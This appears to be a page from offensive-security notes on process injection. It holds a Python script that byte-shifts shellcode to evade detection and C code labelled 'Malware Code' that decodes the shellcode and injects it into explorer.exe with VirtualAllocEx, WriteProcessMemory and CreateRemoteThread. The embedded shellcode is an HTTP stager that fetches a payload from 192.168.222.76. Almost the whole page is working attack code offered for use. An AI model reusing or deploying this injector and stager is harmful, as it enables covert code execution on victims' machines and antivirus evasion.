Process Injection

Python Encoder

import sys

payload = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x69\x6d\x61\x67\x65\x36\x34\x2e\x67\x69\x66\x00\xf0\x5f\x50\x05\x2e\x79\xe2\x37\x4c\x50\xcc\xa2\x96\xbb\x15\x96\x0a\x26\x29\x23\x6f\xae\xdd\xab\xa6\x31\x74\xa8\xae\x81\x04\x5e\xc9\x10\xa2\xe6\x11\xe5\x74\xa0\x8d\x28\x9d\x12\xee\x47\x63\xda\x2f\x76\x2f\xc9\x78\x6b\x1d\x27\xb0\xf7\x36\x58\x09\x19\xe8\xc0\xba\xda\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x38\x39\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x38\x39\x2e\x30\x0d\x0a\x00\x97\x85\x83\x0e\xce\x35\x91\x7b\xe6\x5d\x6a\xe0\xae\x9a\xe7\xdc\xa8\x87\x7b\x4e\xf9\xf8\x12\xcd\x6e\xd8\x5e\x15\x52\x20\x50\x00\x0f\xfe\x84\xc5\x3b\x49\x49\x2d\xaf\x95\x76\x00\x41\xde\x47\x46\x71\x02\x2e\xb6\xea\x5c\xa9\xb5\x55\xcd\xf7\x18\x5d\x5f\x40\xfb\xfe\x17\xa9\x5f\x9e\x28\xd9\x02\xa5\xc7\x9a\xde\xc4\x44\x00\x03\x42\x05\x97\x8b\xb4\xbe\x48\x14\xe1\x9a\xd9\x1a\xf2\xa3\x54\x47\xda\x5e\x8a\x97\x0c\x6e\x63\xbb\xa4\xc3\x59\x51\xbf\xd4\xfd\x36\x2b\xcd\x25\x26\x9f\xc8\xd5\x82\x80\xaa\x32\xf2\xae\x5e\x28\xce\x95\xca\x99\xe7\xce\x42\xdb\x4e\x6c\x6a\x34\xfe\x25\x3f\x26\x86\x0b\xa0\xc2\xfe\x35\x47\xdc\x86\x71\x22\x0f\xee\x4a\x86\x9b\xe2\xd1\x94\xb8\xa4\xa8\xb6\x9e\x1d\xea\x65\x36\xe9\x6b\x43\x95\xc4\x0a\xe1\x76\x4c\x00\x6c\x71\x1d\x0d\x60\xce\xaf\x56\xec\xd2\xf7\x7d\x9a\xa8\xb3\xeb\xf9\x79\xd3\x45\xf6\x11\xae\xce\x8e\xaf\xd3\xa3\xd8\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x28\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x32\x32\x2e\x37\x36\x00\x12\x34\x56\x78"

original_payload = bytearray(payload)

new_payload = []
for opcode in original_payload:
    if opcode == 255:
        new_opcode = opcode
    else:
        new_opcode = opcode + 0x01

    new_payload.append(new_opcode)
    print "opcode -> before:", opcode, ", after:", new_opcode

print "----------------------------------------------------------------------------"
print "New Data in Hex:"
print "".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in new_payload])

Malware Code

#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>
#include <iostream>

DWORD MyGetProcessId(LPCTSTR ProcessName) // non-conflicting function name
{
    PROCESSENTRY32 pt;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pt.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hsnap, &pt)) { // must call this first
        do {
            if (!lstrcmpi(pt.szExeFile, ProcessName)) {
                CloseHandle(hsnap);
                return pt.th32ProcessID;
            }
        } while (Process32Next(hsnap, &pt));
    }
    CloseHandle(hsnap); // close handle on failure
    return 0;
}

int main(int argc, char** argv) {

    DWORD process_id = MyGetProcessId(TEXT("explorer.exe"));
    printf("Process ID is %d\n", process_id);

    unsigned char code[] = "\xfd\x49\x84\xe5\xf1\xe9\xc9\x1\x1\x1\x42\x52\x42\x51\x53\x52\x57\x49\x32\xd3\x66\x49\x8c\x53\x61\x49\x8c\x53\x19\x49\x8c\x53\x21\x49\x8c\x73\x51\x49\x10\xb8\x4b\x4b\x4e\x32\xca\x49\x32\xc1\xad\x3d\x62\x7d\x3\x2d\x21\x42\xc2\xca\xe\x42\x2\xc2\xe3\xee\x53\x42\x52\x49\x8c\x53\x21\x8c\x43\x3d\x49\x2\xd1\x67\x82\x79\x19\xc\x3\x76\x73\x8c\x81\x89\x1\x1\x1\x49\x86\xc1\x75\x68\x49\x2\xd1\x51\x8c\x49\x19\x45\x8c\x41\x21\x4a\x2\xd1\xe4\x57\x49\xff\xca\x42\x8c\x35\x89\x49\x2\xd7\x4e\x32\xca\x49\x32\xc1\xad\x42\xc2\xca\xe\x42\x2\xc2\x39\xe1\x76\xf2\x4d\x4\x4d\x25\x9\x46\x3a\xd2\x76\xd9\x59\x45\x8c\x41\x25\x4a\x2\xd1\x67\x42\x8c\xd\x49\x45\x8c\x41\x1d\x4a\x2\xd1\x42\x8c\x5\x89\x49\x2\xd1\x42\x59\x42\x59\x5f\x5a\x5b\x42\x59\x42\x5a\x42\x5b\x49\x84\xed\x21\x42\x53\xff\xe1\x59\x42\x5a\x5b\x49\x8c\x13\xea\x50\xff\xff\xff\x5e\x6b\x1\x4a\xbf\x78\x6a\x6f\x6a\x6f\x66\x75\x1\x42\x57\x4a\x8a\xe7\x4d\x8a\xf2\x42\xbb\x4d\x78\x27\x8\xff\xd6\x49\x32\xca\x49\x32\xd3\x4e\x32\xc1\x4e\x32\xca\x42\x51\x42\x51\x42\xbb\x3b\x57\x7a\xa8\xff\xd6\xec\x74\x5b\x49\x8a\xc2\x42\xb9\x51\x1\x1\x1\x4e\x32\xca\x42\x52\x42\x52\x6b\x4\x42\x52\x42\xbb\x58\x8a\xa0\xc7\xff\xd6\xec\x5a\x5c\x49\x8a\xc2\x49\x32\xd3\x4a\x8a\xd9\x4e\x32\xca\x53\x69\x1\x3\x41\x85\x53\x53\x42\xbb\xec\x56\x2f\x3c\xff\xd6\x49\x8a\xc7\x49\x84\xc4\x51\x6b\xb\x60\x49\x8a\xf2\x49\x8a\xdb\x4a\xc8\xc1\xff\xff\xff\xff\x4e\x32\xca\x53\x53\x42\xbb\x2e\x7\x19\x7c\xff\xd6\x86\xc1\x10\x86\x9e\x2\x1\x1\x49\xff\xd0\x10\x85\x8d\x2\x1\x1\xec\xd4\xea\xe5\x2\x1\x1\xe9\xa3\xff\xff\xff\x30\x6a\x6e\x62\x68\x66\x37\x35\x2f\x68\x6a\x67\x1\xf1\x60\x51\x6\x2f\x7a\xe3\x38\x4d\x51\xcd\xa3\x97\xbc\x16\x97\xb\x27\x2a\x24\x70\xaf\xde\xac\xa7\x32\x75\xa9\xaf\x82\x5\x5f\xca\x11\xa3\xe7\x12\xe6\x75\xa1\x8e\x29\x9e\x13\xef\x48\x64\xdb\x30\x77\x30\xca\x79\x6c\x1e\x28\xb1\xf8\x37\x59\xa\x1a\xe9\xc1\xbb\xdb\x1\x56\x74\x66\x73\x2e\x42\x68\x66\x6f\x75\x3b\x21\x4e\x70\x7b\x6a\x6d\x6d\x62\x30\x36\x2f\x31\x21\x29\x58\x6a\x6f\x65\x70\x78\x74\x21\x4f\x55\x21\x32\x31\x2f\x31\x3c\x21\x58\x6a\x6f\x37\x35\x3c\x21\x79\x37\x35\x3c\x21\x73\x77\x3b\x39\x3a\x2f\x31\x2a\x21\x48\x66\x64\x6c\x70\x30\x33\x31\x32\x31\x31\x32\x31\x32\x21\x47\x6a\x73\x66\x67\x70\x79\x30\x39\x3a\x2f\x31\xe\xb\x1\x98\x86\x84\xf\xcf\x36\x92\x7c\xe7\x5e\x6b\xe1\xaf\x9b\xe8\xdd\xa9\x88\x7c\x4f\xfa\xf9\x13\xce\x6f\xd9\x5f\x16\x53\x21\x51\x1\x10\xff\x85\xc6\x3c\x4a\x4a\x2e\xb0\x96\x77\x1\x42\xdf\x48\x47\x72\x3\x2f\xb7\xeb\x5d\xaa\xb6\x56\xce\xf8\x19\x5e\x60\x41\xfc\xff\x18\xaa\x60\x9f\x29\xda\x3\xa6\xc8\x9b\xdf\xc5\x45\x1\x4\x43\x6\x98\x8c\xb5\xbf\x49\x15\xe2\x9b\xda\x1b\xf3\xa4\x55\x48\xdb\x5f\x8b\x98\xd\x6f\x64\xbc\xa5\xc4\x5a\x52\xc0\xd5\xfe\x37\x2c\xce\x26\x27\xa0\xc9\xd6\x83\x81\xab\x33\xf3\xaf\x5f\x29\xcf\x96\xcb\x9a\xe8\xcf\x43\xdc\x4f\x6d\x6b\x35\xff\x26\x40\x27\x87\xc\xa1\xc3\xff\x36\x48\xdd\x87\x72\x23\x10\xef\x4b\x87\x9c\xe3\xd2\x95\xb9\xa5\xa9\xb7\x9f\x1e\xeb\x66\x37\xea\x6c\x44\x96\xc5\xb\xe2\x77\x4d\x1\x6d\x72\x1e\xe\x61\xcf\xb0\x57\xed\xd3\xf8\x7e\x9b\xa9\xb4\xec\xfa\x7a\xd4\x46\xf7\x12\xaf\xcf\x8f\xb0\xd4\xa4\xd9\x1\x42\xbf\xf1\xb6\xa3\x57\xff\xd6\x49\x32\xca\xbb\x1\x1\x41\x1\x42\xb9\x1\x11\x1\x1\x42\xba\x41\x1\x1\x1\x42\xbb\x59\xa5\x54\xe6\xff\xd6\x49\x94\x54\x54\x49\x8a\xe8\x49\x8a\xf2\x49\x8a\xdb\x42\xb9\x1\x21\x1\x1\x4a\x8a\xfa\x42\xbb\x13\x97\x8a\xe3\xff\xd6\x49\x84\xc5\x21\x86\xc1\x75\xb7\x67\x8c\x8\x49\x2\xc4\x86\xc1\x76\xd8\x59\x59\x59\x49\x6\x29\x1\x1\x1\x51\xc4\xe9\xa0\xfe\xff\xff\x32\x3a\x33\x2f\x32\x37\x39\x2f\x33\x33\x33\x2f\x38\x37\x1\x13\x35\x57\x79";

    int i;
    for (i = 0; i < sizeof(code) - 1; i++) {
        if (code[i] == 255) {
            code[i] = code[i];
        }
        else {
            code[i] = code[i] - 0x01;
        }
    }

    HANDLE process_handle;
    LPVOID pointer_after_allocated;
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (process_handle == NULL) {
        puts("[-]Error while open the process\n");
    }
    else {
        puts("[+] Process Opened sucessfully\n");
    }

    pointer_after_allocated = VirtualAllocEx(process_handle, NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (pointer_after_allocated == NULL) {
        puts("[-]Error while get the base address to write\n");
    }
    else {
        printf("[+]Got the address to write 0x%x\n", pointer_after_allocated);
    }

    if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, (LPCVOID)code, sizeof(code), 0)) {
        puts("[+]Happened\n");
        puts("[+]Running the code as new thread !\n");
        CreateRemoteThread(process_handle, NULL, 100, (LPTHREAD_START_ROUTINE)pointer_after_allocated, NULL, NULL, 0);
    }
    else {
        puts("Not Happened\n");
    }
}

PreviousObfuscation NextLAPS

Last updated 3 years ago